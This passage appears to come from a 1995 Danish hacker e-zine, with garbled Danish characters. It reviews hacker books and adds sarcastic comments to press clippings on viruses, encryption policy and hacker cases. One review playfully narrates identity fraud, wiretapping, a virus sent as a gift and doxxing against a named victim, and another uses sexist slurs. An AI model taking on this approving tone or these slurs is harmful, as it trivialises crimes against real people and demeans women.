til at lave en s† heftig virus (eller bare en virus). S† hacker vores helt sin nye skoles computer, da han g‘tter sin rektors password. Det ser en af de andre elever p† skolen, og s† er han lige pludselig med i en hacker-gruppe. N† ja, glemte jeg at sige, at fire af gruppens medlemmer g† p† skolen? Glemte jeg ogs† at sige, at et af medlemmerne af gruppen er en pige, som if›lge besk- rivelsen ligner Claudia Schiffer? Lad os tage en lille pause, og regne lidt p† disse tilf‘ldigheder. Hvad er chancen for, at man p† sin f›rste skoledag, finder en (og senere flere) hac- kere? De er i mine ›jne ikke s‘rligt store. Jeg gik personligt i skole med en anden dansk hacker, og der gik 5 †r, f›r jeg fandt ud af, at han hackede. Der- udover s† er en af hackerne sort (og en anden er mexikaner). Personligt s† har jeg kun h›rt om 2 sorte hackere, s† her ryger sandsynligheden ned igen. Og til sidst har vi s† den kvindelige super-hacker-skede. Jeg ved ikke med jer, men hvis i h›rer om nogle hackere, som tilf‘ldigvis er en total sild, ring! Jeg har kun h›rt om en (1) kvindelig hacker, men det var sikkert bare et rygte. Og alle disse dejlige personligheder, de g†r, tilf‘ldigvis, p† den samme skole, jamen er det ikke bare dejligt. I mine ›jne er sandsynligheden lig 0.0001%, men det er bare min mening. Okay, nu har jeg fortalt om vores helte, og nu g›r "Dark-Side-Hackeren" sin entre. Manden er i begyndelsen af de 30, og han insistere p† at blive kaldt "The Plague". Jeg har sj‘ldent h›rt om en st›rre n›rd (m†ske lige Janek & MMJ). Derudover er der en politimand, der er s† dum, at han f†r Jan S›nderbo Carlsen til at virke smart, klog og venlig! Nok om personerne, nu til plottet (eller mangel p† samme). Vores Dark- Side-Hacker er igang med at stj‘le penge fra det firma hvor han arbejder, ved hj‘lp af en slags "orm". Da en af de yngre medlemmer i vores Super-Hacker-Gru- ppe s† hacker systemet, og tage en kritisk fil, g†r vores Dark-Side-Hacker amok, og en krig bryder ud mellem ham og vores Super-Hacker-Gruppe. Ind imellem dette bliver der s† rodet en historie om en virus ind. Men bare rolig, vores "helte" redder selvf›lgelig hele verden. Bogen er sikkert ganske god, hvis man INTET kender til computere. Man bliver fustreret af de mange tekniske fejl og mangler i plottet. Der er f.eks. et tidspunkt, hvor en computer bliver angrebet, og i stedet for at hive stikket ud, s† sidder de og pr›ver at logge folk ud. S† er det at jeg t‘nker: enten er jeg bare s† smart, at kun JEG kan finde ud af, at hive stikket ud [n‘ppe -red], ellers s† er der noget galt i plottet [det er der! -red]. En anden irriterende ting er deres sprog. De taler som warez folk gjorde i 1990, og det er TEMMELIGT ringe at h›re p†. Der er nogle gode momenter i bogen, men alt for meget er for ringe lavet. Det spiller bare IKKE. The Virus Creation Labs - A Journey Into The Underground George C. Smith - American Eagle Publications, Inc - ISBN 0-929408-09-8 L‘st og anmeldt af Clive Sharp Denne bog er skrevet af manden der laver Crypt Newsletter, og den om- handler virus-undergrunden. Bogen starter med at vise hvilket medie-hysteri der var, da Michelangelo-virusen slog til i starten af 1990'erne. Det viser ogs†, hvor lidt journalisterne vidste om computer-viruser, og hvor meget de blev mis- ledt af folk som John McAffe og David Solomon. Derefter f†r undergrunden et par slag i ansigtet. Undergrunde bliver beskyldt for, ikke at lave andet end "str- ani's" (det vil sige lettere modifikationer til en allerede udgivet virus), men der bliver dog gjort opm‘rksom p† nogle af de rigtigt gode virus-coders, s†som Nowhere Man og Priest (tidligere Little Loc). Nowhere Man's Virus Creation Lab bliver ogs†, mere eller mindre, rost. Derefter bliver der brugt rimeligt meget tid p† at hive eksempler frem p† antivirus-codere, der har ego'er p† st›rrelse med Runde T†rn. Det er ganske interessant at l‘se om disse folk i CARO (Computer Anti-virus Research Organi- zation) der er s† selvglade, at selv Don Carlsen virker som en ok mand. Man h›rer ogs† om deres planer om at nedl‘gge samtlige virus-boards, fordi de er "farlige". Dette er den samme gruppe som mener, at det skulle v‘re forbudte b†de at lave og opbevare viruser! Men de m† selvf›lgeligt gerne have viruser, for de er jo de "gode", og hvordan skal de ellers kunne lave antivirus- software? De er i mine ›jne en bunke ynkelige personer, som desv‘rre er blevet meget rige p† at lave antivirus-software. S† er det virus-undergrundens tur til (igen) at blive rakket ned. Her bliver is‘r NuKE rakket ned (lige med undtagelse af Nowhere Man), og der bliver brugt temmeligt meget tid p† at beskrive mere eller mindre "smarte" medlemmer af NuKE. Bogen p†st†r, at dette er et udtryk for den nord-amerikanske virus- scene, lige med undtagelse af et par f† r† programm›ere. Bogen ender med to interview's taget fra det svenske blad Insane Reality. Alt i alt en temmelig god bog, men den er ikke forf‘rdelig lang. Mange af de hardcore virus-codere gik mere eller mindre amok da bogen udkom, og besk- yldte forfatteren for at dolke dem i ryggen. Hvordan og hvor han skulle have gjort det, kan jeg ikke finde ud af, men jeg er jo heller ikke en hardcore virus-coder [Bogen er ude som ASCII -red]. Information Warfare, Chaos on the Electronic Superhighway. Winn Schwartau, Thunder's Mouth Press, ISBN 1-56025-080-1 L‘st og anmeldt af Saron Her er bogen for personen som vil vide noget om, hvordan man irriterrer sin nabo mest muligt - ja eller hvem man nu ikke bryder sig om. Begrebet Infor- mation Warfare d‘kker over mange emner, der har det til f‘lles at de benytter den nyeste men ikke altid den mest advancerede teknologi. Af sjove ting kan n‘vnes: - Industri Spionage - Hacking - Modificeret hard og software - Aflytning af datakommunikation - Kryptologi og kodebrydning - Angreb p† personlige informationer - Magnetiske v†ben Noget nyt i det? Ja! Hans dommedagsagtige m†de at anskue tingene p†, viser l‘seren hvor farlige disse v†ben faktisk er n†r det kommer til stykket - og hvor s†rbart samfundet er. Et eksempel: S›ren bryder sig ikke om Per. S›ren kender til Pers CPR-nummer og navn, s† S›ren kender en god ven, som kan lave falske sygesikringskort. S† nu kan S›ren sige han hedder Per. Godt nok er et sygesikringskort ikke fuldt ud gyldigt, men S›ren ved jo ogs† at de fleste godtager det som legimitation. Nu g†r S›ren ned i Fona og lejer et stort fjernsyn som han stiller hjemme p† sit gulv. Efter et par m†neder vil Fona gerne se nogle penge fra Per, som intetanende bliver helt vildt forvirret og han bruge 30-40 opkald, samtaler med diverse personer og andet p† at overbevise Fona om han er uskyldig. S›ren er ikke tilfreds endnu, s† han forts‘tter med at k›be sjove ting, og inden l‘nge st†r Per i RKI. S›ren ved nu hvor let det er at aflytte Pers telefon, s† det begynder han ogs† p† - og med hans dertil indk›bte Van Eck ting begynder han at 'aflytte' hans computersk‘rm. Per er efterh†nden lettere ked af det, men ved jo ikke hvem det er, som irriterrer ham, og begynder frustreret at tude. S›ren syntes nu at det er lidt synd for Per, s† han v‘lger at sende ham en f›dselsdagsgave i form af et spil til hans computer. Juhu siger Per, og s‘tter det, igen intetanende, i hans computer. Og vupti, Per har nu ikke kun f†et en diskette, men ogs† en personlig virus, der i de f›lgende uger langsomt spiser hans computer op - uden Per fatter en balle! Det sidste S›ren gider, er at lave ged i Pers bankkonti og skatteberegninger (der ligger p† kommunens hackede computer). Efterh†nden som Per bliver mere og mere fortvivlet daler S›rens interesse for Per sig, og han offentligg›rer samtlige informationer han har om Per p† diverse BBS'er, og s† glemmer han om den sag. Vidende om alle de ting han sparrede Per for l‘gger han Information Warfare fra sig igen og g†r en tur, intetanende om hvordan Pers liv har det for tiden.... Nej, bogen er ikke en opskrift p†, hvordan man g›r. Den fort‘ller om mulig- hederne, men uden at fort‘lle om metoderne (i dybden). Selvom man har v‘ret inde i branchen en r‘kke †r, giver den et ret skr‘mmende billede af, hvordan man, med den rette viden, kan f›re krig - p† en ganske ufarlig m†de (for en selv). Bogen henvender sig til alle som kan engelsk, og som kan finde ud af at bladre 430 sider igennem. Ingen tekniske foruds‘tninger er kr‘vet, da den hele tiden bev‘ger sig p† et meget teoretisk (og overfladisk) plan. Interessant, underholdende og ganske l‘rerig l‘sning til de m›rke vintern‘tter. SMERSHDOMMEDAGNU#5SMERSH N Y H E D E R F R A D E N D A N S K E P R E S S E S†dan beskytter du dig mod HACKERE. Rapport Classic - Oktober 1995 Af Clive Sharp -Et godt password: t8Y/x? Det er let at forhindre at ubudne g‘ster snylter p† din tilkobling til f.eks. Internet. Men kun hvis du t‘nker dig om, n†r du v‘lger password. Dit kodeord skal: - V‘re ren volapyk - alts† ingen ord eller navne. - Indeholde b†de store og sm† bogstaver. - Best† af andre tegn end blot bogstaver. - ’ndres j‘vnligt, f.eks. en gang om m†neden. - Ikke skrives ned. L‘r det udenad. - Holdes hemmeligt. Ogs† for mor og k‘resten. Kodeord som "porsche", "tuborg" og "madonna" er alt for nemme at g‘tte. Is‘r af dem, der kender lidt til dine interesser. Et godt password kunne der- imod v‘re "t8Y/x?l". Hvis du da ellers selv kan huske det... -------- S† er det bevist! Jeg har altid sagt, at der er seri›se artikler i pornoblade, og her er s† beviset! ENDNU en godt grund til at k›be Rapport [hmmm -red]. Ung hacker arresteret. ComputerWorld - 5. Oktober 1995 Af Clive Sharp New York: En 16-†rig dreng fra New York er blevet arresteret og sigtet for at have hacket sig ind p† telefonlinier hos telefonselskaberne og deres kunder og foretaget langdistance-opkald for tusindvis af dollars. Drengen, Daniel Swerdloff, mist‘nkes for at v‘re hovedmanden bag en bande p† 40 - 50 hackere i USA og Canada. Efter sigende har han sin viden fra hyppig f‘rden p† Internet og fra undergrundsblade som "2600: The Hackers Quarterly" og risikerer nu op til otte †rs f‘ngsel. Daniels for‘ldre havde s† sent som dagen inden an- holdelsen f†et mistanke om, at han var igang med kriminelle aktiviteter, og moderen havde resolut kappet telefonforbindelsen ud af huset og fjernet tasta- turet fra hans computer, men da var det alts† for sent. -------- Jeg ville godt vide, hvor de f†r disse fantastisk gode historier fra. De virker ogs† yderst seri›se: 40 - 50 hackere, ja selvf›lgeligt, intet mindre kan g›re det. Jeg ville bare godt vide, hvad betegnelsen "hackere" d‘kker over i denne sammenh‘ng??? Ny virus skaber forvirring ComputerWorld - 5. Oktober 1995 Af Clive Sharp En ny virus, der er knyttet til Microsoft Word, har set dagens lys. Den overf›res i helt almindelige dokumenter og bliver eventuelt hentet ned fra Internet eller spredt som elektronisk post. Tidligere var computer-virus afh‘ngige af styresystemet p† computeren. Bestemte virus kunne kun komme p† bestemte maskiner. Det bet›d, at havde man en Macintosh, var man fri for at t‘nke p† alle de virusser, der h‘rgede p† PC'er. De seneste eksempler p† virus f›lger dokumenter og er ligeglade med, hvilken type computer programmet k›rer p†. Dermed er selve dokumentet blevet farligt. Den platform uafh‘ngige virus er den s†kaldte Winword.Concept. Trods forlydende i radioen er denne virus ganske uskadelig og nem at opdage. Sikkerhedsr†dgiver S›ren Olsen fra Instituttet for Datasikkerhed [suk!] mener, at virksomhederne fremover alligevel skal v‘re endnu mere opm‘rksomme p† sikkerheden i deres systemer: -Virksomhederne b›r kontrollere alt, som de lader komme inden for deres system. F›r skulle man kun kontrollere, n†r man indlagde programmer, men med den nye virus kan selv uskyldige dokumenter indeholde virus. Den nye type virus er knyttet til et dokument og bygger p† de auto- matiske instruktionss‘t, som brugere af tekstbehandlingsv‘rkt›jer, selv kan de- finere - de s†kaldte makroer. Da virussen ligger som en makro, g›r det den b†de nem at finde og fjerne, fordi Word har rutiner til b†de at redigere makroer og fjerne dem. Det amerikanske institut for datasikkerhed (NCSA) har unders›gt denne virus og fundet ud af, at selv om den kan overf›res mellem forskellige maskin- typer, kan den kun overf›res, hvis maskinen udveksler dokumenter, der er skre- vet i Microsoft Word version 6.0 eller senere. Tilmed g‘lder, at det kun er engelsk-sprogede udgaver af Word, der vil blive ramt at virussen. S›ren Jensen [hed han ikke Olsen f›r???] g›r opm‘rksom p†, at makro- virus er en forholdsvis ny ting hidtidige antivirus-programmer ikke har taget h›jde for, men peger p†, at problemet f›rst og fremmest er aktuelt for de virk- somheder, der b†de har direkte opkobling til for eksempel Internet og derudover har eget netv‘rk i i organisationen. Han mener desuden, at virksomhederne regelm‘ssigt skal kontrollere deres systemer for virus og eventuelt indf›re helt nye rutiner, der tager h›jde for de nye virus. Microsoft har allerede udsendt et antivirusprogram, der skulle hj‘lpe p† et inficeret system. Programmet kan hentes ned over Internet fra Microsofts hjemmeside: "http://www.microsoft.com". If›lge ComputerWorld US findes der flere eksempler p† makrovirus. Senest er der dukket et eksempel op, der kaldes Wordmacro.Nuclear, som kan g›re skade, n†r systemet er inficeret. Som en mere kuri›s ting udskriver denne virus beskeden: "And Finally I would like to say: STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC", n†r man har skrevet et dokument ud. Hvis man derudover k›re Word den 5. april i et vilk†rligt †r vil styrefilen COMMAND.COM blive slettet. Sikkerhed p† Internettet Jyllandsposten, Martin L. Hansen - 16. Oktober 1995 Af Clive Sharp Internettet er hot. Vi fr‘ser ud af informationsmotorvejen med stor hastighed. Men hvad med sikkerheden, autov‘rnet og airbagen, der skal sikre os, at vi ikke kommer galt afsted? For eksempel er det muligt via programmet Finger der er et almindeligt service-v‘rkt›j, at finde frem til andre brugere og se hvorn†r vedkommende har logget sig ind, om de har f†et post og om de har l‘st deres post. Der er dog nogle Internet-udbydere, der har lukket af for mulig- heden at finde frem til andre brugere via Finger. Finger blev oprindeligt lavet netop til at finde frem til brugere p† andre computere for at kunne kommunikere med dem. Det er derfor en smagssag, om disse oplysninger er f›lsomme eller man anser dem som en facilitet for andre brugere. Det rejser dog sp›rgsm†let omkring sikkerheden p† Internettet, og hvem der har ansvaret for at sikkerheden er i orden. EGET ANSVAR. "Brugerne har eget ansvar for deres Internet-opkobling. Det eneste vi s›rger for, er at levere en forbindelse. Hvordan de enkelte brugere anvender Internet og herunder hvordan de beskytter sig er deres egen sag", siger Stig Berthelsen, produktchef hos Dana Data. J›rgen Bo Madsen [jaaa, skoen, vores helt!!] fra UNI-C, der arbejder med sikkerhedsproblemer, er enig med Stig Ber- thelsen. "Sikkerhedsproblemet ligger ude hos brugerne af Internet og deres an- vendelse af nettet. Hvis man sender f›lsomme informationer over nettet, ville det v‘re dumt ikke at kryptere dem. Det ville v‘re det samme som at sende en pengetransport gennem K›benhavn i en †ben lastvogn", siger J›rgen Bo Madsen, der har en s†kaldt CERT-funktion i Danmark. CERT st†r for Computer Emergency Response Team, der kooridnere EDB-sikkerhedsproblemer b†de i Danmark og videre i udlandet [Nok is‘r i udlandet]. KEDELIG SIKKERHED. I ›jeblikket er der ikke de store sikkerhedsm‘ssige problemer med Internettet. J›rgen Bo Madsen forudser dog, at n†r Internettet for alvor bliver kommercielt, s† bliver de sikkerhedsm‘ssige problemer st›rre. Men til den tid vil der v‘re udviklet krypteringsalgoritmer (hvor data bliver gjort ul‘seligt for uvedkommende), og det arbejde er allerede igang. Blandt andet, er der kom- met sikkerhedsversioner af de popul‘re programmer Mosaic og Netscape, der bruges til at navigere p† Internettet. De amerikanske versioner er sikkerheds- m‘ssigt forsvarlige at bruge til handel p† Internettet, mens der er fundet hul- ler i de europ‘iske versioner. I forbindelse med kryptering af informationer findes der allerede v‘rkt›jer, der kan bruges til dette. PGP, der st†r for Pretty Good Privacy, er et v‘rkt›j, der er velegnet til kryptering af E-mail. Til st›rre datam‘ngder er for eksempel DES, Data Encryption Standard, velegnet. N†r politiet er med p† en lytter Jyllandsposten, Niels Mulvad - 16. Oktober 1995 Af Clive Sharp KRYPTERING Politiet kan nemt lytte med og kigge i folks elektroniske post. Is‘r n†r man bruger moderne teknik. Borgernes og virksomhedernes forsvar mod at blive kigget over skulderen hedder kryptering. Det kan bevare brevhemmelighed og samtalehemmelighed, men det ser ud til, at en r‘kke europ‘iske lande kan f† held til at forhindre kryptering. Forel›big har Danmark holdt sig uden for den politiske debat. Amerikanske teleselskaber tilbyder i dag kunderne at k›be telefoner, der kan kryptere samtalerne. Telefonsnakken l›ber da gennem nettet i en for- vasket form, som ingen kan lytte med p†, bortset fra modtageren. Det forhindre dog ikke politiet i at f† adgang til samtalen. En offentlig n›gle til at bryde krypteringen bliver gemt, og den kan politiet f† udleveret, hvis det kan stille med en dommerkendelse. Samtidig er der sammen med den hemmelige overf›rsel sendt en anden n›gle, og begge n›gler er n›dvendige for at overs‘tte det for- vanskede til et forst†eligt sprog. VڈBEN I USA. Det vil sige, at politiet f›rst skal optage den forvanskede samtale, derefter skaffe sig n›glen via en dommerkendelse, og s† kan man h›re, hvad der er blevet sagt. Eller hvis der er tale om dataoverf›rsel af tekst, kan man overs‘tte teksten. Systemet kan ogs† bruges uden for USA, hvis der er tale om lande, der t‘ller som stormagtens allierede. Andre kan ikke f† lov at bruge systemet, fordi krypterings-systemer i USA er klassificeret som v†ben af 2. grad. Teknisk kaldes systemet for Escrowed Key Encryption, og det bliver af Clinton administrationen betragtet som den rette balance mellem at sikre borg- erne og forretningslivet p† den ene side og politiets mulighed for at bek‘mpe kriminalitet p† den anden. EUROPA BEGYNDT. I Europa er diskussionen f›rst lige begyndt. Forel›big betragter man kryptering i forbindelse med rene betalingssystemer for i orden, mens der er st‘rke kr‘fter i gang for at forbyde kryptering af tekst og samtaler. "Skulle vi indf›re et generelt system i Europa kunne man formentlig g›re det for om- kring 500 kroner pr. telefon. Men ingen t›r at g† i gang, f›r den politiske situation af afklaret", siger direkt›r Peter Landrock, Cryptomathic. Han er lektor i matematik og har udviklet en lang r‘kke af de professionelle krypter- ingssystemer, der anvendes i Danmark og udlandet. Til n‘ste for†r skal han for eksempel lede et halv†rs projekt p† Isaac Newton Institute for Matemathical Sciences p† Cambridge Universitet, hvor 70 forskere fra hele verden meget mod efterretningstjenesternes ›nsker, skal studere krypteringssystemer. I matematikernes sprog hedder det hurtige algoritmer til enkryptering med henblik p† hemmeligholdelse. Ideen er, at metematikere er nogle af de bed- ste til at finde matematiske problemer, der ikke er l›st gennem tusinde af †r. Netop de sv‘reste problemer egner sig bedst som basis for krypteringssystemer, som samtidigt kan arbejde meget hurtigt. PRIMTAL. I Peter Landrocks egne systemer har han typisk taget udgangspunkt i primtal p† op til 100 cifre. Der findes ikke en matematisk model til at finde ud af hvilken to primtal, der ganget med hinanden f›rer til et bestemt tal. Tag for eksempel tallet 2773, der er et produkt af 47 gange 59. Fra tallet 2773 er det umuligt at regne sig tilbage til de to tal. Man kan kun finde de to tal ved at pr›ve sig frem. Og n†r man kommer op i primtal p† 100 cifre er det praktisk umuligt at bryde koden. Det ved de teoretiske matematikere og derfor er de nor- malt bedre til at udarbejde "ubrydelige" krypteringssystemer end efterretnings- tjenesterne [Ja, for de bruger jo ikke matematikere, vel??]. "Men disse systemer er selvf›lgeligt ikke mere sikker, end hvis der en gang kommer en matematiker, der kan l›se g†den, s† kan han ogs† bryde koderne. Men det er alts† ikke sket i flere tusinde †r", siger Peter Landrock. I hans system bliver de to primtal udvalgt tilf‘ldigt af systemet selv, og derfor er der ingen, selv ikke i hans firma, der kender koderne. "Der er tale om et helt sikkert system, hvor man kun kan l‘se eller lytte til det afsendte, hvis man har de rigtige n›gler. Man kan altid v‘re sikker p† afsenderens identitet. Det kan ogs† bruges som en elektronisk underskrift, og det g›res allerede af en r‘kke private firmaer og personer i Danmark", fort‘ller han. DANSK TAVSHED. I den europ‘iske debat har Danmark forel›big holdt sig tavs. I Frankrig er der forbud mod at anvende Kryptering, fordi der er tradition for, at det franske efterretningsv‘sen m† lytte med p† samtaler ind og ud af landet, uden f›rst at skulle have fat i en dommerkendelse. I Storbritannien er der samme tradition, men her er meningerne delte. Man vil ikke hindre kryptering, men ›nsker at undg† eksport af krypteringsteknik. I Tyskland skal politiet kunne lytte med p† de offentlige net. I Holland har man behandlet et forslag om for- bud mod kryptering, men det faldt v‘k. I Belgien overvejes et forslag om for- bud. EU-r†det har kort f›r †rsskiftet vedtaget regler, der skal forhindre udf›rsel af varer og teknologier med dobbelt-anvendelse. De regler er efter- f›lgende, nemlig den 13. juni i †r, udm›ntet i Danmark i form af en bekendtg›r- else, hvor man ogs† omtaler s‘rlige f›lsomme produkter, der ikke engang m† sen- des til andre medlemslande i EU, med mindre man har en s‘rlig tilladelse. P† den liste optr‘der tungt vand, plutonium, uran og alts† krypteringsudstyr, der g†r videre end beskyttelse af banktransaktioner. Netop krypteringssystemerne har v‘ret det mest f›lsomme i debatten. POLITISK STILLING. "Vi vil se p† en henvendelse fra sag til sag. Vi vil ikke acceptere et frit salg af systemerne, men skal i hvert tilf‘lde se, hvad k›beren skal bruge systemet til. Hvis vi er overbevist om, at det er til civil brug, giver vi til- ladelsen", siger kontorchef Bjarne Bitsch, Erhvervsministeriet. Det er Erhverv- sministeriet, der skal give tilladelser i Danmark. Han oplyser, at Danmark gen- erelt st›tter tanken om brevhemmeligheder, men at man i EU-regi endnu ikke har taget en debat om kryptering og brug af en Escrowed-l›sning. "Men der er behov for, at vi i Danmark tager politisk stilling til, om vi skal have en Escrowed-l›sning, og for at vi begynder at pr‘ge debatten i Europa", siger Peter Landrock. Ellers kan det let blive den Franske tankegang der sl†r igennem, som han siger. Det betyder, at kryptering bliver gjort s† besv‘rligt som muligt for borgerne. "Og i virkligheden er det absurd. For de storkriminelle har ikke besv‘r med at skaffe sig krypteringssystemer. De fylder intet og kan let smugles fra et land til et andet. S† et forbud eller en besv‘r- ligg›relse rammer stort set kun de lovlydige", siger Peter Landrock. BORGERKORTET. Han har en anden pointe i forbindelse med Escrowed. Hvis danskerne siger ja til borgerkortet og bagefter vedtager at g† ind for Escrowedmodellen, risikerer vi, at skulle lave alle borgerkortene om igen. Det har man selvf›lge- ligt set f›r med pas, k›rekort og sygesikringskort. Men det koster, n†r alle borgerne skal have skiftet kort. "Borgerkortet drejer sig ogs† om at overf›re private oplysninger. Derfor vil det v‘re naturligt at have samme sikkerheds- modeller i det kort som ved telefonsamtaler og dataoverf›rsler", fastsl†r Peter Landrock. Krypto-politik til debat Politiken - 19. Oktober 1995 Af Clive Sharp Sp›rgsm†let om, hvordan man sikre elektronisk post mod aflytning, er kontroversielt, men ikke tilstr‘kkeligt behandlet, mener konsulent Steffen Stripp fra TeknologiN‘vnet. Og for at afhj‘lpe dette og give et grundlag for en dr›ftelse af problemet, har TeknologiN‘vnet netop udsendt rapporten "En dansk kryptopolitik", hvor en r‘kke eksperter kommer med deres vurderinger af behovet for "en dansk kryptopolitik", som det mundret hedder. Der findes computer- programmer, s†kaldte krypteringsprogrammer, som kan sikre elektronisk post mod, at forkerte ›jne l‘ser dem, men de er ikke synderligt udbredte, og der findes ingen lovf‘stede standarter p† omr†det. I rapporten rejsen en r‘kke sp›rgsm†l, blandt andet om hemmeligholdelse af data med retten til privatlivets fred, om det er lovligt at kryptere data med henblik p† hemmeligholdelse, om det er en offentlig opgave at opbygge et system til dette, og ikke mindst, hvem der skal kontrollere de krypteringsn›gler, som anvendes. En dansk krypto-politik inde- holder bidrag fra blandt andet politiet. Den kan rekvireres hos Teknologi- N‘vnet, Antonigade 4, 1106 K›benhavn K eller p† telefon 33 32 05 03. Hackernes betvinger Politiken, Pernille Tranberg - 19. Oktober 1995 Af Clive Sharp Josh Quittner kastede sig ud i †ben krig med hackerne - og fuldst‘ndigt som ventet slog hackerne igen. Nu starter netguruen [!!!] en ny onlinetjeneste. Josh Quittner, en af USAs absolutte cyberspace-guruer og en af hacker- nes v‘rste fjender, er en travl mand. Fra sit kontor p† 23. etage i Time Warner bygningen p† Manhattan skriver han artikler til TIME magazine om alt fra hackerbander og online kasinoer til de nye Macintosh-modeller og telelovgiv- ningen. Samtidig er han ved at oprette sin egen online nyhedsservice p† World Wide Web, han underviser universitetsstuderende i "Cyberspace Reporting", og s† skriver han et par thrillers ind imellem om Internettet. Den 38-†rige familiefar er typen, som allerede har sagt nej til to job- tilbud p† WIRED magazine. Men han er ikke kun en efterspurgt cyberspace- ekspert. De hackere, som han og hans kone, Michelle Slatalla, har skrevet om i deres bog, "Masters Of Deception" har l‘nge ›nsket at f† ram p† ham. Det beg- yndte for n›jagtigt et †r siden p† den amerikanske "Thanksgiving" aften. Hver gang nogle ringede til dem, fik de en automatisk telefonstemme, som lukkede en masse vulg‘re ting ud. Deres E-mail blev blokeret, fordi den blev proppet med tusindevis af u›nskede beskeder. Og hver gang de selv havde ringet og lagt r›ret p† efter en telefonsamtale, ringede den igen, uden at der var nogle i den anden ende. Der var hackere p† spil. De havde brudt ind i telefonv‘senets sys- tem med det eneste form†l at chikanere ham og hans familie p† Long Island, New York [ja, for andet kan de jo ikke bruge det til, vel???]. Det er nu tre m†neder siden familien sidst har m‘rket noget til hack- erne. Josh Quittner er sikker p†, at politiet har fanget den sidste bandit i den computerbande, der havde set sig ond p† dem [bandit??? computerbande??]. Hackernes chikane har langt fra taget modet fra familien Quittner. -Vi vidste, at s†dan noget sikkert ville ske, da vi skrev bogen. Og vi har aldrig f›lt os fysisk truede, for de er ikke fysiske mennesker [heldigt for dem, at de aldrig har m›dt Leroy og Bobby Ewing!!!]. De er nogle forstyrrede unger, som ›nsker at bruge deres computere til at ›del‘gge og stj‘le ting, siger Josh Quittner. Mange af de onde hackere i "Masters Of Deception", som er oversat til svensk, tysk og japansk, sidder idag bag tremmer [Hmmm...]. Men der er ogs† mange gode hackere, siger Josh Quittner. Faktisk er det f›rst de sidste fem- seks †r, at ordet "hacker" er blevet associeret med noget negativt. F›r i tiden kaldte man computerprogramm›rer for hackere, og hvis de kreerede korte, gode programmer havde de lavet "et godt hack". -Mange hackere er ikke destruktive, de vil ikke ›del‘gge. Nogle af dem, vi skrev om, er nogle fattige kn‘gte, som har et meget begr‘nset udstyr. De kan hacke sig ind i store systemer og l‘re en masse om det. De ville aldrig ›del‘gge noget, for hvorfor skulle man ›del‘gge det, der giver en den st›rste gl‘de i verden. LUKKET FOR HACKING. Josh Quittner punkterer de romantiske forestillinger som hackere p† sin vis har form†et at skabe om sig [nej, som pressen har skabt!]. -Det st›rste problem er, at de taler som om de ejer hele verden. I bund og grund er det dybt, dybt kedeligt det, de laver, for i dag er det s† godt som umuligt at hacke sig ind p† de virkelig interessante ting [!!!]. Det kunne man i 1980erne, da det hele var mere eller mindre †bent. Dengang kunne man manipulere med kre- ditkort og med telefonv‘senet [og det kan man ikke idag??]. I dag er de fleste hackere henvist til at samle p† andre Internet-brugeres kodeord. Og det er m†ske en big deal, eh! Josh Quittner begyndte som journalist p† en lokalspr›jte i Albuqueque, New Mexico. Han l‘ste s† en Masters of Science in Journalism p† Columbia Uni- versity i New York - hvor han ogs† underviser i dag - og fik derp† job som kri- minalreporter p† New York Newsday. I 1991 skiftede han stofomr†de og begyndte at skrive om teknologi. Hurtigt fandt han ud af, at l‘serne ville l‘se om Internettet. Siden februar i †r har han v‘ret p† TIME magazine efter han takke- de nej til b†de et job som redaktionschef og som skrivende journalist p† Wired magazine. Ham og Michelle Slatalla har netop afsluttet deres fjerde bog, "Flame Words", en thriller om Internettet, som udkommer via forlaget Harper Collins n‘ste †r. Samtidig med at man bliver underholdt, l‘rer man, hvordan man kan bruge Internettet. Hvis antallet af Internetbrugere forts‘tter med at stige s† eksplosivt som nu, vil hele verden v‘re online i †r 2002 if›lge Josh Quittners diagram over v‘kst i befolkningen og Internettet, men s†dan g†r det selvf›lge- lig ikke, siger han. -Internettet vil dr›ne igennem den udviklede verden som en Ebola-virus. N†r det kommer til den tredje verden, vil den bremse brat op, for der har de mange steder hverken telefon- eller computernetv‘rk. Og hvad skal de ogs† bruge det til, hvis de ikke f†r mad i munden. TRAVLT MED AT SIGE OP. Internettet er Josh Quittners ‚t og alt. -Det er idag et vidt †bent, totalt lovl›st sted, og det r†ber p†, at man tager risici og eksperimenterer, siger han. Og det g›r han s†. 8. November kan Internet-brugere l‘se hans online "Netly News" p† Time Warners Pathfinder service. De bliver ultrakorte, under- holdende og morsomme, lover han, og han planl‘gger, modsat andre net-nyheder, at bruge multimediet ved at eksperimentere med hypertekst, video og lyd. Hans dr›m er at flytte ud af Time Warners kontor og hjem til familiens hus i Long Island, sine to sm† piger og Michelle, som lige har sagt sit faste job op p† avisen Newsday for at arbejde freelance som cyberspaceskribent. Han h†ber, at der snart bliver opfundet en m†de, hvorp† man via nettet kan f† direkte betaling for ens arbejde. At man for eksempel som journalist eller skribent selv kan putte sine artikler og tekst p† Nettet, og s† m† l‘ser- ne betale for eksempel 10 ›re for hvert klik med musen. S† snart s†dan en form for online-micro-betaling eksisterer, er hans dr›m g†et i opfyldelse. -Hvis Netly News ikke bliver en succes, s† bliver jeg fyret om tre m†neder. Hvis det bliver en succes, s† siger jeg op om seks m†neder, for s† har jeg bevist, at det kan fungere, og s† kan jeg tage alle mine ideer og sige farvel, siger Josh Quittner. -Og det er det, der er s† smukt og magtfuldt ved Internettet. Det giver os, du og jeg, kontrol over distributionen. Vi beh›ver ikke TIME magazine eller Pathfinder til at distribuere vores ideer. Med Nettet kan vi selv. Pro- blemet lige nu er bare, at det er gratis. Netly News er p† World Wide Web efter 8. november p† adressen: http://www.pathfinder.com/netly. Dixie - en hacker har talt Politiken, Christian Harbou - 26. Oktober 1995 Af Clive Sharp Hackeren Dixie venter p† at blive stillet for retten i danmarkshistori- ens st›rste hackersag. En sag, som han mener, er bl‘st alt for stort op. Compu- ter har talt med ham. Han starter med at spise r›gen fra tre cigaretter og stille krav om at f† at vide, hvad jeg helt n›jagtigt har t‘nkt mig at skrive. Det kan jeg selv- f›lgeligt ikke fort‘lle ham, f›r han selv har fortalt sin historie. Men efter 10 minutter er det lykkedes at f† den 23-†rige studerende og tiltalt i den store hackersag, alias Haslev-sagen, beroliget s† meget, at jeg kan stille det f›rste sp›rgsm†l: -Hvor meget tror du, du f†r? S† rasler korthuset sammen en gang til. Han skodder en cigaret, som han lige skulle til at t‘nde, og ser p† mig med ›jne, der slet ikke ser mig, men en skr‘kfilm i den indre biograf. Skranken, dommeren, den rasende anklager, de ulykkelige for‘ldre p† bageste r‘kke i salen. Pressen, der venter med blitzlys udenfor. De ›jne, der stirrer p† mig som om jeg var "the man, you wouldnt wanna meet" fort‘ller historien af sig selv. Der er h›j cigarf›ring i vennekredsen, 